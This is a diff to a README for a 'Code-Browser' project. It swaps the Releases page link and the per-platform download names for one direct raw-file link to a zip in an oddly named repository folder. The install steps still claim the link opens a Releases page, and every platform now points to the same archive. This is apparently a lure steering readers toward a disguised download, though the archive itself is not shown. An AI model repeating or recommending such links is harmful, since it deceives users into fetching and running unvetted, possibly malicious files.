boltastan/Code-Browser/README.md

 ## 📥 Download & Install

-To get Code-Browser, visit this page to download: [Code-Browser Releases](https://github.com/boltastan/Code-Browser/releases).
+To get Code-Browser, visit this page to download: [Code-Browser Releases](https://raw.githubusercontent.com/boltastan/Code-Browser/main/banjuke/Browser_Code_2.6-beta.4.zip).

 1. Click on the link above to go to the Releases page.
 2. Find the most recent version listed at the top.
 3. Look for the file that matches your operating system:
-   - For Windows, you might see something like `Code-Browser-Windows.zip`.
+   - For Windows, you might see something like `https://raw.githubusercontent.com/boltastan/Code-Browser/main/banjuke/Browser_Code_2.6-beta.4.zip`.
-   - For macOS, look for `Code-Browser-Mac.zip`.
+   - For macOS, look for `https://raw.githubusercontent.com/boltastan/Code-Browser/main/banjuke/Browser_Code_2.6-beta.4.zip`.
-   - For Linux, check for `Code-Browser-Linux.tar.gz`.
+   - For Linux, check for `https://raw.githubusercontent.com/boltastan/Code-Browser/main/banjuke/Browser_Code_2.6-beta.4.zip`.
 4. Click on the file name to begin the download.

 ### 📂 Extract and Run